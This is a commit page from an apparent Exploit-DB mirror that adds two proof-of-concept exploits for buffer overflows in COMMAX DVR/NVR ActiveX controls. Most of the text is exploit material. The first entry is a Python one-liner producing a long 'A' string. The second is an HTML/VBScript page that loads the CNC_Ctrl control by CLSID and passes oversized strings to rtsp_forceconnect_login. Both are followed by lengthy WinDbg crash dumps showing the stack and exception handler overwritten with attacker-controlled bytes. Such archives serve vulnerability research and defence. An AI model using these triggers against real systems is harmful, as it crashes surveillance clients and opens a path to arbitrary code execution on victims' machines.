bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-08-28

Browse source 
3 changes to exploits/shellcodes

CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
This commit is contained in:
Offensive Security 2021-08-28 05:01:59 +00:00
parent 99acfa06c4
commit ac4322c402
4 changed files with 1089 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

332
exploits/hardware/webapps/50231.txt Normal file
View file

@ -0,0 +1,332 @@
# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 2.1.4.5
Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user inserts overly long array of string bytes
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.
Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
02.08.2021
--
$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere
(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~.
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0:038:x86> d ebp
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................
0:038:x86> d esi
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:038:x86> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141
FAULTING_THREAD: 00005b30
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: IEXPLORE.EXE
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 41414141
FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]
WRITE_ADDRESS: 41414141
WATSON_BKT_PROCSTAMP: 95286d96
WATSON_BKT_PROCVER: 11.0.19041.1
PROCESS_VER_PRODUCT: Internet Explorer
WATSON_BKT_MODULE: CNC_Ctrl.DLL
WATSON_BKT_MODSTAMP: 547ed821
WATSON_BKT_MODOFFSET: 1043bf
WATSON_BKT_MODVER: 1.7.0.2
MODULE_VER_PRODUCT: CNC_Ctrl Module
BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e
MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n152]
Type: [ZEROED_STACK]
Class: Addendum
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [0x5220]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546
THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5
FAULT_INSTR_CODE: 458baaf3
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: CNC_Ctrl
IMAGE_NAME: CNC_Ctrl.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
STACK_COMMAND: ~38s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
FAILURE_MODULE_NAME: CNC_Ctrl
BUCKET_ID_MODULE_STR: CNC_Ctrl
FAILURE_FUNCTION_NAME: DllUnregisterServer
BUCKET_ID_FUNCTION_STR: DllUnregisterServer
BUCKET_ID_OFFSET: f5501
BUCKET_ID_MODTIMEDATESTAMP: 547ed821
BUCKET_ID_MODCHECKSUM: 357a4b
BUCKET_ID_MODVER_STR: 1.7.0.2
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
TARGET_TIME: 2021-08-12T12:21:50.000Z
OSBUILD: 19042
OSSERVICEPACK: 1023
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.1023
ANALYSIS_SESSION_ELAPSED_TIME: 1d869
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
Followup: MachineOwner
---------

551
exploits/hardware/webapps/50232.txt Normal file
View file

@ -0,0 +1,551 @@
# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.7.0.2
Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
DVR/NVR.
Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a heap
based buffer overflow when a user inserts overly long array of
string bytes through several functions. Successful exploitation
could allow execution of arbitrary code on the affected node.
Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5664
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php
02.08.2021
--
<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
<!-- parameters: user_id, user_pwd and rtsp_addr -->
<html>
<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
prototype = "Function rtsp_forceconnect_login ( ByVal user_id As String , ByVal user_pwd As String , ByVal rtsp_addr As String , ByVal rtsp_port As Long , ByVal rtp_proto As Long , ByVal device As Long , ByVal islive As Long , ByVal ch As Long ) As Long"
memberName = "rtsp_forceconnect_login"
progid = "CNC_CTRLLib.UMS_Ctrl"
argCount = 8
arga=String(2510, "C")
argb=String(2510, "B")
argc=String(2510, "A")
argd=1
arge=1
argf=1
argg=1
argh=1
cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh
</script>
</html>
==
(5b1c.59e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> r
eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> !exchain
030feab4: 41414141
Invalid exception stack at 41414141
0:000:x86> d esp
030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000:x86> d ebp
030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0:000:x86> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 000012d4
Attempt to write to address 000012d4
FAULTING_THREAD: 000056a4
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: wscript.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 000012d4
FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
WRITE_ADDRESS: 000012d4
WATSON_BKT_PROCSTAMP: 7159f3df
WATSON_BKT_PROCVER: 5.812.10240.16384
PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host
WATSON_BKT_MODULE: CNC_Ctrl.DLL
WATSON_BKT_MODSTAMP: 547ed821
WATSON_BKT_MODOFFSET: 27da1
WATSON_BKT_MODVER: 1.7.0.2
MODULE_VER_PRODUCT: CNC_Ctrl Module
BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e
MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n152]
Type: [ZEROED_STACK]
Class: Addendum
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [0x56e4]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
IP_ON_HEAP: 61616161
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 61616161
FRAME_ONE_INVALID: 1
LAST_CONTROL_TRANSFER: from 61616161 to 10027da1
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
00afe298 61616161 61616161 61616161 61616161 0x61616161
00afe29c 61616161 61616161 61616161 61616161 0x61616161
00afe2a0 61616161 61616161 61616161 61616161 0x61616161
00afe2a4 61616161 61616161 61616161 61616161 0x61616161
00afe2a8 61616161 61616161 61616161 61616161 0x61616161
00afe2ac 61616161 61616161 61616161 61616161 0x61616161
00afe2b0 61616161 61616161 61616161 61616161 0x61616161
00afe2b4 61616161 61616161 61616161 61616161 0x61616161
00afe2b8 61616161 61616161 61616161 61616161 0x61616161
00afe2bc 61616161 61616161 61616161 61616161 0x61616161
00afe2c0 61616161 61616161 61616161 61616161 0x61616161
00afe2c4 61616161 61616161 61616161 61616161 0x61616161
00afe2c8 61616161 61616161 61616161 61616161 0x61616161
00afe2cc 61616161 61616161 61616161 61616161 0x61616161
00afe2d0 61616161 61616161 61616161 61616161 0x61616161
00afe2d4 61616161 61616161 61616161 61616161 0x61616161
00afe2d8 61616161 61616161 61616161 61616161 0x61616161
00afe2dc 61616161 61616161 61616161 61616161 0x61616161
00afe2e0 61616161 61616161 61616161 61616161 0x61616161
00afe2e4 61616161 61616161 61616161 61616161 0x61616161
00afe2e8 61616161 61616161 61616161 61616161 0x61616161
00afe2ec 61616161 61616161 61616161 61616161 0x61616161
00afe2f0 61616161 61616161 61616161 61616161 0x61616161
00afe2f4 61616161 61616161 61616161 61616161 0x61616161
00afe2f8 61616161 61616161 61616161 61616161 0x61616161
00afe2fc 61616161 61616161 61616161 61616161 0x61616161
00afe300 61616161 61616161 61616161 61616161 0x61616161
00afe304 61616161 61616161 61616161 61616161 0x61616161
00afe308 61616161 61616161 61616161 61616161 0x61616161
00afe30c 61616161 61616161 61616161 61616161 0x61616161
00afe310 61616161 61616161 61616161 61616161 0x61616161
00afe314 61616161 61616161 61616161 61616161 0x61616161
00afe318 61616161 61616161 61616161 41414141 0x61616161
00afe31c 61616161 61616161 41414141 41414141 0x61616161
00afe320 61616161 41414141 41414141 41414141 0x61616161
00afe324 41414141 41414141 41414141 41414141 0x61616161
00afe328 41414141 41414141 41414141 41414141 0x41414141
00afe32c 41414141 41414141 41414141 41414141 0x41414141
00afe330 41414141 41414141 41414141 41414141 0x41414141
00afe334 41414141 41414141 41414141 41414141 0x41414141
00afe338 41414141 41414141 41414141 41414141 0x41414141
00afe33c 41414141 41414141 41414141 41414141 0x41414141
00afe340 41414141 41414141 41414141 41414141 0x41414141
00afe344 41414141 41414141 41414141 41414141 0x41414141
00afe348 41414141 41414141 41414141 41414141 0x41414141
00afe34c 41414141 41414141 41414141 41414141 0x41414141
00afe350 41414141 41414141 41414141 41414141 0x41414141
00afe354 41414141 41414141 41414141 41414141 0x41414141
00afe358 41414141 41414141 41414141 41414141 0x41414141
00afe35c 41414141 41414141 41414141 41414141 0x41414141
00afe360 41414141 41414141 41414141 41414141 0x41414141
00afe364 41414141 41414141 41414141 41414141 0x41414141
00afe368 41414141 41414141 41414141 41414141 0x41414141
00afe36c 41414141 41414141 41414141 41414141 0x41414141
00afe370 41414141 41414141 41414141 41414141 0x41414141
00afe374 41414141 41414141 41414141 41414141 0x41414141
00afe378 41414141 41414141 41414141 41414141 0x41414141
00afe37c 41414141 41414141 41414141 41414141 0x41414141
00afe380 41414141 41414141 41414141 41414141 0x41414141
00afe384 41414141 41414141 41414141 41414141 0x41414141
00afe388 41414141 41414141 41414141 41414141 0x41414141
00afe38c 41414141 41414141 41414141 41414141 0x41414141
00afe390 41414141 41414141 41414141 41414141 0x41414141
00afe394 41414141 41414141 41414141 41414141 0x41414141
00afe398 41414141 41414141 41414141 41414141 0x41414141
00afe39c 41414141 41414141 41414141 41414141 0x41414141
00afe3a0 41414141 41414141 41414141 41414141 0x41414141
00afe3a4 41414141 41414141 41414141 41414141 0x41414141
00afe3a8 41414141 41414141 41414141 41414141 0x41414141
00afe3ac 41414141 41414141 41414141 41414141 0x41414141
00afe3b0 41414141 41414141 41414141 41414141 0x41414141
00afe3b4 41414141 41414141 41414141 41414141 0x41414141
00afe3b8 41414141 41414141 41414141 41414141 0x41414141
00afe3bc 41414141 41414141 41414141 41414141 0x41414141
00afe3c0 41414141 41414141 41414141 41414141 0x41414141
00afe3c4 41414141 41414141 41414141 41414141 0x41414141
00afe3c8 41414141 41414141 41414141 41414141 0x41414141
00afe3cc 41414141 41414141 41414141 41414141 0x41414141
00afe3d0 41414141 41414141 41414141 41414141 0x41414141
00afe3d4 41414141 41414141 41414141 41414141 0x41414141
00afe3d8 41414141 41414141 41414141 41414141 0x41414141
00afe3dc 41414141 41414141 41414141 41414141 0x41414141
00afe3e0 41414141 41414141 41414141 41414141 0x41414141
00afe3e4 41414141 41414141 41414141 41414141 0x41414141
00afe3e8 41414141 41414141 41414141 41414141 0x41414141
00afe3ec 41414141 41414141 41414141 41414141 0x41414141
00afe3f0 41414141 41414141 41414141 41414141 0x41414141
00afe3f4 41414141 41414141 41414141 41414141 0x41414141
00afe3f8 41414141 41414141 41414141 41414141 0x41414141
00afe3fc 41414141 41414141 41414141 41414141 0x41414141
00afe400 41414141 41414141 41414141 41414141 0x41414141
00afe404 41414141 41414141 41414141 41414141 0x41414141
00afe408 41414141 41414141 41414141 41414141 0x41414141
00afe40c 41414141 41414141 41414141 41414141 0x41414141
00afe410 41414141 41414141 41414141 41414141 0x41414141
00afe414 41414141 41414141 41414141 41414141 0x41414141
00afe418 41414141 41414141 41414141 41414141 0x41414141
00afe41c 41414141 41414141 41414141 41414141 0x41414141
00afe420 41414141 41414141 41414141 41414141 0x41414141
00afe424 41414141 41414141 41414141 41414141 0x41414141
00afe428 41414141 41414141 41414141 41414141 0x41414141
00afe42c 41414141 41414141 41414141 41414141 0x41414141
00afe430 41414141 41414141 41414141 41414141 0x41414141
00afe434 41414141 41414141 41414141 41414141 0x41414141
00afe438 41414141 41414141 41414141 41414141 0x41414141
00afe43c 41414141 41414141 41414141 41414141 0x41414141
00afe440 41414141 41414141 41414141 41414141 0x41414141
00afe444 41414141 41414141 41414141 41414141 0x41414141
00afe448 41414141 41414141 41414141 41414141 0x41414141
00afe44c 41414141 41414141 41414141 41414141 0x41414141
00afe450 41414141 41414141 41414141 41414141 0x41414141
00afe454 41414141 41414141 41414141 41414141 0x41414141
00afe458 41414141 41414141 41414141 41414141 0x41414141
00afe45c 41414141 41414141 41414141 41414141 0x41414141
00afe460 41414141 41414141 41414141 41414141 0x41414141
00afe464 41414141 41414141 41414141 41414141 0x41414141
00afe468 41414141 41414141 41414141 41414141 0x41414141
00afe46c 41414141 41414141 41414141 41414141 0x41414141
00afe470 41414141 41414141 41414141 41414141 0x41414141
00afe474 41414141 41414141 41414141 41414141 0x41414141
00afe478 41414141 41414141 41414141 41414141 0x41414141
00afe47c 41414141 41414141 41414141 41414141 0x41414141
00afe480 41414141 41414141 41414141 41414141 0x41414141
00afe484 41414141 41414141 41414141 41414141 0x41414141
00afe488 41414141 41414141 41414141 41414141 0x41414141
00afe48c 41414141 41414141 41414141 41414141 0x41414141
00afe490 41414141 41414141 41414141 41414141 0x41414141
00afe494 41414141 41414141 41414141 41414141 0x41414141
00afe498 41414141 41414141 41414141 41414141 0x41414141
00afe49c 41414141 41414141 41414141 41414141 0x41414141
00afe4a0 41414141 41414141 41414141 41414141 0x41414141
00afe4a4 41414141 41414141 41414141 41414141 0x41414141
00afe4a8 41414141 41414141 41414141 41414141 0x41414141
00afe4ac 41414141 41414141 41414141 41414141 0x41414141
00afe4b0 41414141 41414141 41414141 41414141 0x41414141
00afe4b4 41414141 41414141 41414141 41414141 0x41414141
00afe4b8 41414141 41414141 41414141 41414141 0x41414141
00afe4bc 41414141 41414141 41414141 41414141 0x41414141
00afe4c0 41414141 41414141 41414141 41414141 0x41414141
00afe4c4 41414141 41414141 41414141 41414141 0x41414141
00afe4c8 41414141 41414141 41414141 41414141 0x41414141
00afe4cc 41414141 41414141 41414141 41414141 0x41414141
00afe4d0 41414141 41414141 41414141 41414141 0x41414141
00afe4d4 41414141 41414141 41414141 41414141 0x41414141
00afe4d8 41414141 41414141 41414141 41414141 0x41414141
00afe4dc 41414141 41414141 41414141 41414141 0x41414141
00afe4e0 41414141 41414141 41414141 41414141 0x41414141
